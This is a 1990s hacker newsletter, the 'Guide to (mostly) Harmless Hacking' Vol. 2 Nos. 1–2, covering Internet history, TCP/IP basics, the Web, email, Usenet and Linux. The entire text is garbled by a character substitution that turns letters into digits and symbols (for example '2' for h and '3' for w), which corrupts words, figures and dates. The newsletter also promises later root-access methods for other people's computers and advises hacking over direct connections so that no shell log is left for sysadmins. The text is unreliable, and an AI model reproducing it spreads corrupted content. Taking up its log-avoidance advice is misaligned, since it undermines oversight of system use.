Hacking for Dummies Contents of Volume 2: Internet for Dummies Linux! Introduction to TCP/IP Port Surfing! !

"ID# T$ %mostl&' H()*L#SS H(C+I,! Vol- 2 ,um.er / Internet for Dummies 00 ski1 t2is if &ou are a "nix 3i4ard- 5ut if &ou read on &ou6ll get some more ke3l 2acking instructionsT2e six !uides to %mostl&' Harmless Hacking of Vol- / 7um1ed immediatel& into 2o30 to 2acking tricks- 5ut if &ou are like me8 all t2ose details of 1ro.ing 1orts and 1la&ing 3it2 2&1ot2eses and 1inging do3n 2osts gets a little di44&ingSo 2o3 a.out catc2ing our .reat28 standing .ack and re9ie3ing 32at t2e 2eck it is t2at 3e are 1la&ing 3it2: $nce 3e get t2e .asics under control8 3e t2en can mo9e on to serious 2acking(lso8 I 2a9e .een 3restling 3it2 m& conscience o9er 32et2er to start gi9ing &ou ste10 .&0 ste1 instructions on 2o3 to gain root access to ot2er 1eo1les6 com1uters- T2e little angel on m& rig2t s2oulder 32is1ers8 ;!aining root 3it2out 1ermission on ot2er 1eo1le6s com1uters is not nice- So don6t tell 1eo1le 2o3 to do it-< T2e little de9il on m& left s2oulder sa&s8 ;Carol&n8 all t2ese 2ackers t2ink &ou don6t kno3 not2in6! P)$$V# to t2em &ou kno3 2o3 to crack! < T2e little angel sa&s8 ;If an&one reading !uide to %mostl&' Harmless Hacking tries out t2is trick8 &ou mig2t get in trou.le 3it2 t2e la3 for cons1irac& to damage ot2er 1eo1les6 com1uters-< T2e little de9il sa&s8 ;5ut8 Carol&n8 tell 1eo1le 2o3 to crack into root and t2e& 3ill t2ink &ou are +#=L!< So 2ere6s t2e deal- In t2is and t2e next fe3 issues of !uide to %mostl&' Harmless Hacking I6ll tell &ou se9eral 3a&s to get logged on as t2e su1eruser in t2e root account of some Internet 2ost com1uters- 5ut t2e instructions 3ill lea9e a t2ing or t3o to t2e imagination*& t2eor& is t2at if &ou are 3illing to 3ade t2roug2 all t2is8 &ou 1ro.a.l& aren6t one of t2ose c2ea1 t2rills 2acker 3anna.es 32o 3ould use t2is kno3ledge to do somet2ing destructi9e t2at 3ould land &ou in 7ail>>>>>>> >> > > > > > > > > > > > > > > > > > > > > Tec2nical ti1: If &ou 3is2 to .ecome a >serious> 2acker8 &ou6ll need Linux %a free3are 9ariet& of "nix' on &our PC- $ne reason is t2at t2en &ou can crack into root legall& all &ou 3ant 00 on &our o3n com1uter- It sure .eats struggling around on someone else6s com1uter onl& to disco9er t2at 32at &ou t2oug2t 3as root 3as a cle9erl& set tra1 and t2e s&sadmin and ?5I laug2 at &ou all t2e 3a& to 7ailLinux can .e installed on a PC 3it2 as little as a @AB CP"8 onl& 2 *. )(* and as little as 2C *5 of 2ard disk- Dou 3ill need to reformat &our 2ard disk- =2ile some 1eo1le 2a9e successfull& installed Linux 3it2out tras2ing t2eir D$S/=indo3s stuff8 don6t count on getting a3a& 3it2 it5acku18 .acku18 .acku1! >>>>>>> >> > > > > > > > > > > > > > > > > > > > > >>>>>>> >> > > > > > > > > > > > > > > > > > > > > Dou can go to 7ail 3arning: Crack into root on someone else6s com1uter and t2e slammer .ecomes a definite 1ossi.ilit&- T2ink a.out t2is: 32en &ou see a ne3s stor& a.out some 2acker getting .usted8 2o3 often do &ou recogni4e t2e name: Ho3 often is t2e latest .ust .eing done to someone famous8 like Dark Tangent or seEen or #mmanuel !oldstein: Ho3 a.out8 like8 ne9er! T2at6s .ecause reall& good 2ackers figure out 2o3 to not do stu1id stuff- T2e& learn 2o3 to crack into com1uters for t2e intellectual c2allenge and to figure out 2o3 to make com1uters safe from intruders- T2e& don6t .ull t2eir 3a& into root and make a mess of t2ings8 32ic2 tends to ins1ire s&sadmins to call t2e co1s>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > #xciting notice: Is it too .oring to 7ust 2ack into &our o3n Linux mac2ine: Hang in t2ere- Ira =inkler of t2e ,ational Com1uter Securit& (ssociation8 Dean !arlick of t2e S1ace D&namics La. of "ta2 State "ni9ersit& and I are 3orking on setting u1 2ack-net8 a 1lace 32ere it 3ill .e legal to .reak into com1uters- ,ot onl& t2at8 3e6re looking for s1onsors 32o 3ill gi9e cas2 a3ards and

sc2olars2i1s to t2ose 32o s2o3 t2e greatest 2acking skills- ,o3 does t2at sound like more 12un t2an 7ail: >>>>>>> >> > > > > > > > > > > > > > > > > > > > > So8 let6s 7um1 into our 2acking .asics tutorial 3it2 a look at t2e 3ondrous anarc2& t2at is t2e Internet,ote t2at t2ese !uides to %mostl&' Harmless Hacking focus on t2e Internet- T2at is .ecause t2ere are man& legal 3a&s to 2ack on t2e Internet- (lso8 t2ere are o9er /C million of t2ese readil& 2acka.le com1uters on t2e Internet8 and t2e num.er gro3s e9er& da&Internet 5asics ,o one o3ns t2e Internet- ,o one runs it- It 3as ne9er 1lanned to .e 32at it is toda&- It 7ust 2a11ened8 t2e mutant outgro3t2 of a /FBF "S Defense (d9anced )esearc2 Pro7ects (genc& ex1erimentT2is anarc2ic s&stem remains tied toget2er .ecause its users 9oluntaril& o.e& some .asic rulesT2ese rules can .e summed u1 in t3o 3ords: "nix and TCP/IP %3it2 a nod to ""CP'- If &ou understand8 trul& understand "nix and TCP/IP %and ""CP'8 &ou 3ill .ecome a fis2 s3imming in t2e sea of c&.ers1ace8 an ".er2acker among 2acker 3anna.es8 a master of t2e Internet uni9erseTo get tec2nical8 t2e Internet is a 3orld0 3ide distri.uted com1uter/com mu nications net3ork 2eld toget2er .& a common communications standard8 Transmission Control Protocol/Internet Protocol %TCP/IP' and a .it of ""CP- T2ese standards allo3 an&one to 2ook u1 a com1uter to t2e Internet8 32ic2 t2en .ecomes anot2er node in t2is net3ork of t2e Internet- (ll t2at is needed is to get an Internet address assigned to t2e ne3 com1uter8 32ic2 is t2en kno3n as an Internet G2ost8G and tie into an Internet communications link- T2ese links are no3 a9aila.le in almost all 1arts of t2e 3orldIf &ou use an on0 line ser9ice from &our 1ersonal com1uter8 &ou8 too8 can tem1oraril& .ecome 1art of t2e Internet- T2ere are t3o main 3a&s to 2ook u1 to an on0 line ser9iceT2ere is t2e c&.ercouc2 1otato connection t2at e9er& ne3.ie uses- It reHuires eit2er a 1oint0 to0 1oint %PPP' or SLIPconnection8 32ic2 allo3s &ou to run 1rett& 1ictures 3it2 &our =e. .ro3ser- If &ou got some sort of 1ackaged soft3are from &our ISP8 it automaticall& gi9es &ou t2is sort of connection$r &ou can connect 3it2 a terminal emulator to an Internet 2ost- T2is 1rogram ma& .e somet2ing as sim1le as t2e =indo3s @-/ ;Terminal< 1rogram under t2e ;(ccessories< icon- $nce &ou 2a9e dialed in and connected &ou are 7ust anot2er terminal on t2is 2ost mac2ine- It 3on6t gi9e &ou 1rett& 1ictures- T2is connection 3ill .e similar to 32at &ou get on an old0 fas2ioned 55S- 5ut if &ou kno3 2o3 to use t2is kind of connection8 it could e9en gi9e &ou root access to t2at 2ost5ut 2o3 is t2e 2ost com1uter &ou use attac2ed to t2e Internet: It 3ill .e running some 9ariet& of t2e "nix o1erating s&stem- Since "nix is so eas& to ada1t to almost an& com1uter8 t2is means t2at almost an& com1uter ma& .ecome an Internet 2ost?or exam1le8 I sometimes enter t2e Internet t2roug2 a 2ost 32ic2 is a Silicon !ra12ics Indigo com1uter at "ta2 State "ni9ersit&- Its Internet address is fantasia-idec-sdl-usu-edu- T2is is a com1uter o1timi4ed for com1uter animation 3ork8 .ut it can also o1erate as an Internet 2ost- $n ot2er occasions t2e entr& 1oint used ma& .e 1egasus-unm-edu8 32ic2 is an I5* )S BCCC *odel @EC- T2is is a com1uter o1timi4ed for researc2 at t2e "ni9ersit& of ,e3 *exico(n& com1uter 32ic2 can run t2e necessar& soft3are 00 32ic2 is .asicall& t2e "nix o1erating s&stem 00 2as a modem8 and is tied to an Internet communications link8 ma& .ecome an Internet node- #9en a PC ma& .ecome an Internet 2ost .& running one of t2e Linux fla9ors of "nix- (fter setting it u1 3it2 Linux &ou can arrange 3it2 t2e ISP of &our c2oice to link it 1ermanentl& to t2e InternetIn fact8 man& ISPs use not2ing more t2an net3orked PCs running Linux! (s a result8 all t2e com1uting8 data storage8 and sending8 recei9ing and for3arding of messages on t2e Internet is 2andled .& t2e millions of com1uters of man& t&1es and o3ned .& countless com1anies8 educational institutions8 go9ernmental entities and e9en indi9iduals#ac2 of t2ese com1uters 2as an indi9idual address 32ic2 ena.les it to .e reac2ed t2roug2 t2e Internet if 2ooked u1 to a a11ro1riate communications link- T2is address ma& .e re1resented in t3o 3a&s: as a name or a num.erT2e communications links of t2e Internet are also o3ned and maintained in t2e same anarc2ic fas2ion as t2e 2osts- #ac2 o3ner of an Internet 2ost is res1onsi.le for finding and 1a&ing for a

communications link t2at 3ill get t2at 2ost tied in 3it2 at least one ot2er 2ost- Communications links ma& .e as sim1le as a 12one line8 a 3ireless data link suc2 as cellular digital 1acket data8 or as com1licated as a 2ig2 s1eed fi.er o1tic link- (s long as t2e communications link can use TCP/IP or ""CP8 it can fit into t2e InternetT2us t2e net gro3s 3it2 no o9erall coordination- ( ne3 o3ner of an Internet 2ost need onl& get 1ermission to tie into one communications link to one ot2er 2ost- (lternati9el&8 if t2e 1ro9ider of t2e communications link decides t2is 2ost is8 for exam1le8 a 2a9en for s1ammers8 it can cut t2is ;rogue site< off of t2e Internet- T2e rogue site t2en must snooker some ot2er communications link into t&ing it into t2e Internet againT2e 3a& most of t2ese interconnected com1uters and communications links 3ork is t2roug2 t2e common language of t2e TCP/IP 1rotocol- 5asicall&8 TCP/IP .reaks an& Internet communication into discrete G1ackets-G #ac2 1acket includes information on 2o3 to rout it8 error correction8 and t2e addresses of t2e sender and reci1ient- T2e idea is t2at if a 1acket is lost8 t2e sender 3ill kno3 it and resend t2e 1acket- #ac2 1acket is t2en launc2ed into t2e Internet- T2is net3ork ma& automaticall& c2oose a route from node to node for eac2 1acket using 32ate9er is a9aila.le at t2e time8 and reassem.les t2e 1ackets into t2e com1lete message at t2e com1uter to 32ic2 it 3as addressedT2ese 1ackets ma& follo3 tortuous routes- ?or exam1le8 one 1acket ma& go from a node in 5oston to (msterdam and .ack to t2e "S for final destination in Houston8 32ile anot2er 1acket from t2e same message mig2t .e routed t2roug2 Tok&o and (t2ens8 and so on- "suall&8 2o3e9er8 t2e communications links are not nearl& so torturous- Communications links ma& include fi.er o1tics8 12one lines and satellitesT2e strengt2 of t2is 1acket0 s3itc2ed net3ork is t2at most messages 3ill automaticall& get t2roug2 des1ite 2ea9& message traffic congestion and man& communications links .eing out of ser9ice- T2e disad9antage is t2at messages ma& sim1l& disa11ear 3it2in t2e s&stem- It also ma& .e difficult to reac2 desired com1uters if too man& communications links are una9aila.le at t2e timeHo3e9er8 all t2ese 3onderful features are also 1rofoundl& 2acka.le- T2e Internet is ro.ust enoug2 to sur9i9e 00 so its in9entors claim 00 e9en nuclear 3ar- Det it is also so 3eak t2at 3it2 onl& a little .it of instruction8 it is 1ossi.le to learn 2o3 to seriousl& s1oof t2e s&stem %forged email' or e9en tem1oraril& 1ut out of commission ot2er 1eo1leIs Internet 2ost com1uters %flood 1inging8 for exam1le-' $n t2e ot2er 2and8 t2e 2eaders on t2e 1ackets t2at carr& 2acking commands 3ill gi9e a3a& t2e account information from 32ic2 a 2acker is o1erating- ?or t2is reason it is 2ard to 2ide 1erfectl& 32en on t2e InternetIt is t2is tension .et3een t2is 1o3er and ro.ustness and 3eakness and 1otential for confusion t2at makes t2e Internet a 2acker 1la&ground?or exam1le8 H#)# IS D$") H(C+#) TIP D$"6V# 5##, =(ITI,! ?$) THIS ISS"#: ft1://ft1-secnet-com T2is ft1 site 3as 1osted on t2e 5"!T)(J list8 32ic2 is dedicated to discussion of "nix securit& 2oles- *oderator is (le12 $ne8 32o is a genuine ".er2acker- If &ou 3ant to su.scri.e to t2e 5"!T)(J8 email LISTS#)VKnets1ace-org 3it2 message ;su.scri.e 5"!T)(J-< ,o38 .ack to Internet .asicsHistor& of Internet (s mentioned a.o9e8 t2e Internet 3as .orn as a "S (d9anced )esearc2 Pro7ects (genc& %()P(' effort in /FBF- Its in9entors called it ()P(,#T- 5ut .ecause of its 9alue in scientific researc28 t2e "S ,ational Science ?oundation %,S?' took it o9er in /FA@- 5ut o9er t2e &ears since t2en it graduall& e9ol9ed a3a& from an& single source of control- In (1ril /FFL ,S? cut t2e last a1ron strings- ,o3 t2e Internet is run .& no one- It 7ust 2a11ens and gro3s out of t2e efforts of t2ose 32o 1la& 3it2 it and struggle 3it2 t2e soft3are and 2ard3are,ot2ing at all like t2is 2as e9er 2a11ened .efore- =e no3 2a9e a com1uter s&stem 3it2 a life of its o3n- =e8 as 2ackers8 form a .ig 1art of t2e mutation engine t2at kee1s t2e Internet e9ol9ing and gro3ing stronger- =e also form a .ig 1art of t2e immune s&stem of t2is exotic creatureT2e original idea of ()P(,#T 3as to design a com1uter and communications net3ork t2at 3ould e9entuall& .ecome so redundant8 so ro.ust8 and so a.le to o1erate 3it2out centrali4ed control8 t2at it could e9en sur9i9e nuclear 3ar- =2at also 2a11ened 3as t2at ()P(,#T e9ol9ed into a .eing t2at 2as sur9i9ed t2e end of go9ernment funding 3it2out e9en a .li1 in its gro3t2- T2us its

anarc2ic offs1ring8 t2e Internet8 2as succeeded .e&ond t2e 3ildest dreams of its original arc2itectsT2e Internet 2as gro3n ex1losi9el&8 3it2 no end in sig2t- (t its ince1tion as ()P(,#T it 2eld onl& M 2osts- ( Huarter of a centur& later8 in /FAM8 it contained onl& /CCC 2osts- 5ut o9er t2e next L &ears t2is num.er gre3 tenfold to /C8CCC %/FAF'- $9er t2e follo3ing M &ears it gre3 anot2er tenfold to / million %/FF@'- T3o &ears later8 at t2e end of /FFL8 t2e Internet 3as estimated to 2a9e at least B million 2ost com1uters- T2ere are 1ro.a.l& o9er /C million no3- T2ere a11ears to .e no end in sig2t &et to t2e incredi.le gro3t2 of t2is mutant c2ild of ()P(,#TIn fact8 one concern raised .& t2e ex1onential gro3t2 in t2e Internet is t2at demand ma& e9entuall& far outrace ca1acit&- 5ecause no3 no entit& o3ns or controls t2e Internet8 if t2e ca1acit& of t2e communications links among nodes is too small8 and it 3ere to .ecome seriousl& .ogged do3n8 it mig2t .e difficult to fix t2e 1ro.lem?or exam1le8 in /FAA8 )o.ert *orris8 Nr- unleas2ed a G9irusG0 t&1e 1rogram on t2e Internet commonl& kno3n as t2e ;*orris =orm-< T2is 9irus 3ould make co1ies of itself on 32ate9er com1uter it 3as on and t2en send co1ies o9er communications links to ot2er Internet 2osts- %It used a .ug in sendmail t2at allo3ed access to root8 allo3ing t2e 9irus to act as t2e su1eruser'Juickl& t2e ex1onential s1read of t2is 9irus made t2e Internet colla1se from t2e communications traffic and disk s1ace it tied u1(t t2e time t2e Internet 3as still under some sem.lance of control .& t2e ,ational Science ?oundation and 3as connected to onl& a fe3 t2ousand com1uters- T2e ,et 3as s2ut do3n and all 9iruses 1urged from its 2ost com1uters8 and t2en t2e ,et 3as 1ut .ack into o1eration- *orris8 mean32ile8 3as 1ut in 7ailT2ere is some concern t2at8 des1ite im1ro9ed securit& measures %for exam1le8 Gfire3allsG'8 someone ma& find a ne3 3a& to launc2 a 9irus t2at could again s2ut do3n t2e Internet- !i9en t2e loss of centrali4ed control8 restarting it could .e muc2 more time0 consuming if t2is 3ere to 2a11en again5ut reesta.lis2ing a centrali4ed control toda& like 32at existed at t2e time of t2e ;*orris =orm< is likel& to .e im1ossi.le- #9en if it 3ere 1ossi.le8 t2e original ()P(,#T arc2itects 3ere 1ro.a.l& correct in t2eir assessment t2at t2e ,et 3ould .ecome more susce1ti.le for massi9e failure rat2er t2an less if some centrali4ed control 3ere in 1lacePer2a1s t2e single most significant feature of toda&Is Internet is t2is lack of centrali4ed control,o 1erson or organi4ation is no3 a.le to control t2e Internet- In fact8 t2e difficult& of control .ecame an issue as earl& as its first &ear of o1eration as ()P(,#T- In t2at &ear email 3as s1ontaneousl& in9ented .& its users- To t2e sur1rise of ()P(,#TIs managers8 .& t2e second &ear email accounted for t2e .ulk of t2e communication o9er t2e s&stem5ecause t2e Internet 2ad gro3n to 2a9e a full& autonomous8 decentrali4ed life of its o3n8 in (1ril /FFL8 t2e ,S? Huit funding ,S?,#T8 t2e fi.er o1tics communications .ack.one 32ic2 at one time 2ad gi9en ,S? t2e tec2nolog& to control t2e s&stem- T2e 1roliferation of 1arallel communications links and 2osts 2ad .& t2en com1letel& .&1assed an& 1ossi.ilit& of centrali4ed controlT2ere are se9eral ma7or features of t2e Internet: > =orld =ide =e. 00 a 2&1ertext 1u.lis2ing net3ork and no3 t2e fastest gro3ing 1art of t2e Internet> email 00 a 3a& to send electronic messages > "senet 00 forums in 32ic2 1eo1le can 1ost and 9ie3 1u.lic messages > telnet 00 a 3a& to login to remote Internet com1uters > file transfer 1rotocol 00 a 3a& to do3nload files from remote Internet com1uters > Internet rela& c2at 00 real0 time text con9ersations 00 used 1rimaril& .& 2ackers and ot2er Internet old0 timers > go12er 00 a 3a& of cataloging and searc2ing for information- T2is is ra1idl& gro3ing o.solete(s &ou 1ort surfers kno38 t2ere are do4ens of ot2er interesting .ut less 3ell kno3n ser9ices suc2 as 32ois8 finger8 1ing etcT2e =orld =ide =e. T2e =orld =ide =e. is t2e ne3est ma7or feature of t2e Internet8 dating from t2e s1ring of /FF2It consists of G=e. 1ages8G 32ic2 are like 1ages in a .ook8 and links from s1eciall& marked 3ords8 12rases or s&m.ols on eac2 1age to ot2er =e. 1ages- T2ese 1ages and links toget2er create 32at is kno3n as G2&1ertext-G T2is tec2niHue makes it 1ossi.le to tie toget2er man& different documents 32ic2 ma& .e 3ritten .& man& 1eo1le and stored on man& different com1uters

around t2e 3orld into one 2&1ertext documentT2is tec2niHue is .ased u1on t2e "ni9ersal )esource Locator %")L' standard8 32ic2 s1ecifies 2o3 to 2ook u1 3it2 t2e com1uter and access t2e files 3it2in it 32ere t2e data of a =e. 1age ma& .e stored( ")L is al3a&s of t2e form 2tt1:// Orest of addressP8 32ere Orest of addressP includes a domain name 32ic2 must .e registered 3it2 an organi4ation called Inter,IC in order to make sure t2at t3o different =e. 1ages %or email addresses8 or com1uter addresses' donIt end u1 .eing identical- T2is registration is one of t2e fe3 centrali4ed control features of t2e InternetHereIs 2o3 t2e 2&1ertext of t2e =orld =ide =e. 3orks- T2e reader 3ould come to a statement suc2 as Gour com1an& offers LTL truck ser9ice to all ma7or "S cities-G If t2is statement on t2e G=e. 1ageG is 2ig2lig2ted8 t2at means t2at a click of t2e readerIs com1uter mouse 3ill take 2im or 2er to a ne3 =e. 1age 3it2 details- T2ese ma& include com1lete sc2edules and a form to fill out to order a 1icku1 and deli9er&Some =e. 1ages e9en offer 3a&s to make electronic 1a&ments8 usuall& t2roug2 credit cardsHo3e9er8 t2e securit& of mone& transfers o9er t2e Internet is still a ma7or issue- Det des1ite concerns 3it2 9erifia.ilit& of financial transactions8 electronic commerce o9er t2e =e. is gro3ing fast- In its second full &ear of existence8 /FFM8 onl& some Q/E-B million in sales 3ere conducted o9er t2e =e.- 5ut in /FFL8 sales reac2ed QMCC million- Toda&8 in /FFB8 t2e =e. is 7ammed 3it2 commercial sites .egging for &our credit card informationIn addition8 t2e =e. is .eing used as a tool in t2e distri.ution of a ne3 form of currenc&8 kno3n as electronic cas2- It is concei9a.le t2at8 if t2e 2urdle of 9erifia.ilit& ma& .e o9ercome8 t2at electronic cas2 %often called ecas2' ma& 1la& a ma7or role in t2e 3orld econom&8 sim1lif&ing international trade- It ma& also e9entuall& make national currencies and e9en taxation as 3e kno3 it o.solete#xam1les of =e. sites 32ere one ma& o.tain ecas2 include t2e *ark T3ain 5ank of St- Louis8 *$ %2tt1://333-markt 3ain-com' and Digicas2 of (msterdam8 T2e ,et2erlands %2tt1://333-digicas2-com'T2e almost out0 of0control nature of t2e Internet manifests itself on t2e =orld =ide =e.- T2e aut2or of a =e. 1age does not need to get 1ermission or make an& arrangement 3it2 t2e aut2ors of ot2er =e. 1ages to 32ic2 2e or s2e 3is2es to esta.lis2 links- Links ma& .e esta.lis2ed automaticall& sim1l& .& 1rogram ming in t2e ")Ls of desired =e. 1age linksCon9ersel&8 t2e onl& 3a& t2e aut2or of a =e. 1age can 1re9ent ot2er 1eo1le from reading it or esta.lis2ing 2&1ertext links to it is to set u1 a 1ass3ord 1rotection s&stem %or .& not 2a9ing communications links to t2e rest of t2e Internet'( 1ro.lem 3it2 t2e =orld =ide =e. is 2o3 to find t2ings on it- Nust as an&one ma& 2ook a ne3 com1uter u1 to t2e Internet8 so also t2ere is no central aut2orit& 3it2 control or e9en kno3ledge of 32at is 1u.lis2ed 32ere on t2e =orld =ide =e.- ,o one needs to ask 1ermission of a central aut2orit& to 1ut u1 a =e. 1age$nce a user kno3s t2e address %")L' of a =e. 1age8 or at least t2e ")L of a =e. 1age t2at links e9entuall& to t2e desired 1age8 t2en it is 1ossi.le %so long as communications links are a9aila.le' to almost instantl& 2ook u1 3it2 t2is 1age5ecause of t2e 9alue of kno3ing ")Ls8 t2ere no3 are man& com1anies and academic institutions t2at offer searc2a.le indexes %located on t2e =e.' to t2e =orld =ide =e.- (utomated 1rograms suc2 as =e. cra3lers searc2 t2e =e. and catalog t2e ")Ls t2e& encounter as t2e& tra9el from 2&1ertext link to 2&1ertext link- 5ut .ecause t2e =e. is constantl& gro3ing and c2anging8 t2ere is no 3a& to create a com1re2ensi9e catalog of t2e entire =e.#mail #mail is t2e second oldest use of t2e Internet8 dating .ack to t2e ()P(net of /FE2- %T2e first use 3as to allo3 1eo1le to remotel& log in to t2eir c2oice of one of t2e four com1uters on 32ic2 ()P(net 3as launc2ed in /FE/-' T2ere are t3o ma7or uses of email: 1ri9ate communications8 and .roadcasted email- =2en .roadcasted8 email ser9es to make announcements %one0 3a& .roadcasting'8 and to carr& on discussions among grou1s of 1eo1le suc2 as our Ha11& Hacker list- In t2e grou1 discussion mode8 e9er& message sent .& e9er& mem.er of t2e list is .roadcasted to all ot2er mem.ersT2e t3o most 1o1ular 1rogram t&1es used to .roadcast to email discussion grou1s are ma7ordomo and listser9"senet

"senet 3as a natural outgro3t2 of t2e .roadcasted email grou1 discussion list- $ne 1ro.lem 3it2 email lists is t2at t2ere 3as no eas& 3a& for 1eo1le ne3 to t2ese grou1s to 7oin t2em- (not2er 1ro.lem is t2at as t2e grou1 gro3s8 a mem.er ma& .e deluged 3it2 do4ens or 2undreds of email messages eac2 da&In /FEF t2ese 1ro.lems 3ere addressed .& t2e launc2 of "senet- "senet consists of ne3s grou1s 32ic2 carr& on discussions in t2e form of G1osts-G "nlike an email discussion grou18 t2ese 1osts are stored8 t&1icall& for t3o 3eeks or so8 a3aiting 1otential readers- (s ne3 1osts are su.mitted to a ne3s grou18 t2e& are .roadcast to all Internet 2osts t2at are su.scri.ed to carr& t2e ne3s grou1s to 32ic2 t2ese 1osts .elong=it2 man& Internet connection 1rograms &ou can see t2e similarities .et3een "senet and email5ot2 2a9e similar 2eaders8 32ic2 track t2eir mo9ement across t2e ,et- Some 1rograms suc2 as Pine are sent u1 to send t2e same message simultaneousl& to .ot2 email addresses and ne3sgrou1s- (ll "senet ne3s readers allo3 &ou to email t2e aut2ors of 1osts8 and man& also allo3 &ou to email t2ese 1osts t2emsel9es to &ourself or ot2er 1eo1le,o38 2ere is a Huick o9er9ie3 of t2e Internet .asics 3e 1lan to co9er in t2e next se9eral issues of !uide to %mostl&' Harmless Hacking: /- "nix =e discuss ;s2ells< 32ic2 allo3 one to 3rite 1rograms %;scri1ts<' t2at automate com1licated series of "nix commands- T2e reader is introduced to t2e conce1t of scri1ts 32ic2 1erform 2acking functions- =e introduce Perl8 32ic2 is a s2ell 1rogram ming language used for t2e most elite of 2acking scri1ts suc2 as S(T(,@- TCP/IP and ""CP T2is c2a1ter co9ers t2e communications links t2at .ind toget2er t2e Internet from a 2ackersI 1ers1ecti9e- #xtra attention is gi9en to ""CP since it is so 2acka.leM- Internet (ddresses8 Domain ,ames and )outers T2e reader learns 2o3 information is sent to t2e rig2t 1laces on t2e Internet8 and 2o3 2ackers can make it go to t2e 3rong 1laces! Ho3 to look u1 ""CP 2osts %32ic2 are not under t2e domain name s&stem' is includedL- ?undamentals of #lite Hacking: Ports8 Packets and ?ile Permissions T2is section lets t2e genie of serious 2acking out of t2e .ottle- It offers a series of exercises in 32ic2 t2e reader can en7o& gaining access to almost an& randoml& c2osen Internet 2ost- In fact8 .& t2e end of t2e c2a1ter t2e reader 3ill 2a9e 2ad t2e c2ance to 1ractice se9eral do4en tec2niHues for gaining entr& to ot2er 1eo1lesI com1uters- Det t2ese 2acks 3e teac2 are /CCR legal! =ant to su.scri.e to t2is list: #mail 2ackerKtec2.roker-com 3it2 t2e message ;su.scri.e 2a11&2acker- < =ant to s2are some ke3l stu12 3it2 t2e Ha11& Hacker list: Send &our messages to 2ackerKtec2.roker-com- To send me confidential email %1lease8 no discussions of illegal acti9ities' use cmeinelKtec2.roker-com- Please direct flames to de9/nullKtec2.roker-com- Ha11& 2acking! Co1&rig2t /FFB Carol&n P- *einel- Dou ma& for3ard t2e !"ID# T$ %mostl&' H()*L#SS H(C+I,! as long as &ou lea9e t2is notice at t2e end-!"ID# T$ %mostl&' H()*L#SS H(C+I,! Vol- 2 ,um.er 2 Linux! "nix 2as .ecome t2e 1rimo o1erating s&stem of t2e Internet- In fact8 "nix is t2e most 3idel& used o1erating s&stem in t2e 3orld among com1uters 3it2 more 1o3er t2an PCsTrue8 =indo3s ,T is coming u1 fast as a common Internet o1erating s&stem8 and is sooo 3onderfull& .ugg& t2at it looks like it could .ecome t2e num.er one fa9orite to crack into- 5ut toda& "nix in all its 3onderful fla9ors still is t2e o1erating s&stem to kno3 in order to .e a trul& elite 2ackerSo far 3e 2a9e assumed t2at &ou 2a9e .een 2acking using a s2ell account t2at &ou get t2roug2 &our Internet Ser9ice Pro9ider %ISP'- ( s2ell account allo3s &ou to gi9e "nix commands on one of &our ISPIs com1uters- 5ut &ou donIt need to de1end on &our ISP for a mac2ine t2at lets &ou 1la&

3it2 "nix- Dou can run "nix on &our o3n com1uter and 3it2 a SLIP or PPP connection .e directl& connected to t2e Internet>>>>>>> >> > > > > > > > > > > > > > > ,e3.ie note: Serial Line Internet Protocol %SLIP' and Point0 to0 Point Protocol %PPP' connections gi9e &ou a tem1orar& Internet Protocol %IP' address t2at allo3s &ou to .e 2ooked directl& to t2e Internet- Dou 2a9e to use eit2er SLIP or PPP connections to get to use a =e. .ro3ser t2at gi9es &ou 1ictures instead on text onl&- So if &ou can see 1ictures on t2e =e.8 &ou alread& 2a9e one of t2ese a9aila.le to &ouT2e ad9antage of using one of t2ese direct connections for &our 2acking acti9ities is t2at &ou 3ill not lea9e .e2ind a s2ell log file for &our ISPIs s&sadmin to 1ore o9er- #9en if &ou are not .reaking t2e la38 a s2ell log file t2at s2o3s &ou doing lots of 2acker stu12 can .e enoug2 for some s&sadmins to summaril& close &our account>>>>>>> >> > > > > > > > > > > > =2at is t2e .est kind of com1uter to run "nix on: "nless &ou are a 3ealt2& 2acker 32o t2inks not2ing of .u&ing a Sun SP()C 3orkstation8 &ouIll 1ro.a.l& do .est 3it2 some sort of PC- T2ere are almost countless 9ariants of "nix t2at run on PCs8 and a fe3 for *acs- *ost of t2em are free for do3nload8 or inex1ensi9el& a9aila.le on CD0)$*sT2e t2ree most common 9ariations of "nix t2at run on PCs are SunIs Solaris8 ?ree5SD and LinuxSolaris costs around QECC- #noug2 said- ?ree5SD is reall&8 reall& good- 5ut &ou conIt find man& manuals or ne3sgrou1s t2at co9er ?ree5SDLinux8 2o3e9er8 2as t2e ad9antage of .eing a9aila.le in man& 9ariants %so &ou can 2a9e fun mixing and matc2ing 1rograms from different Linux offerings'- *ost im1ortantl&8 Linux is su11orted .& man& manuals8 ne3s grou1s8 mail lists and =e. sites- If &ou 2a9e 2acker friends in &our area8 most of t2em 1ro.a.l& use Linux and can 2el1 &ou out>>>>>>> >> > > > > > > > > > > > > Historical note: Linux 3as created in /FF/ .& a grou1 led .& Linus Tor9alds of t2e "ni9ersit& of Helsinki- Linux is co1&rig2ted under t2e !," !eneral Pu.lic License- "nder t2is agreement8 Linux ma& .e redistri.uted to an&one along 3it2 t2e source code- (n&one can sell an& 9ariant of Linux and modif& it and re1ackage it- 5ut e9en if someone modifies t2e source code 2e or s2e ma& not claim co1&rig2t for an&t2ing created from Linux- (n&one 32o sells a modified 9ersion of Linux must 1ro9ide source code to t2e .u&ers and allo3 t2em to reuse it in t2eir commercial 1roducts 3it2out c2arging licensing fees- T2is arrangement is kno3n as a Gco1&left-G "nder t2is arrangement t2e original creators of Linux recei9e no licensing or s2are3are feesLinus Tor9alds and t2e man& ot2ers 32o 2a9e contri.uted to Linux 2a9e done so from t2e 7o& of 1rogram ming and a sense of communit& 3it2 all of us 32o 3ill 2o1efull& use Linux in t2e s1irit of good gu& 2acking- Vi9a Linux! Vi9a Tor9alds! >>>>>>> >> > > > > > > > > > > > > > Linux consists of t2e o1erating s&stem itself %called t2e GkernelG' 1lus a set of associated 1rogramsT2e kernel8 like all t&1es of "nix8 is a multitasking8 multi0 user o1erating s&stem- (lt2oug2 it uses a different file structure8 and 2ence is not directl& com1ati.le 3it2 D$S and =indo3s8 it is so flexi.le t2at man& D$S and =indo3s 1rograms can .e run 32ile in Linux- So a 1o3er user 3ill 1ro.a.l& 3ant to .oot u1 in Linux and t2en .e a.le to run D$S and =indo3s 1rograms from Linux(ssociated 1rograms t2at come 3it2 most Linux distri.utions ma& include: > a s2ell 1rogram %5ourne (gain S2ell 00 5(SH 00 is most common'S > com1ilers for 1rogram ming languages suc2 as ?ortran0 EE %m& fa9orite!'8 C8 CT T8 Pascal8 LISP8 *odula0 28 (da8 5asic %t2e .est language for a 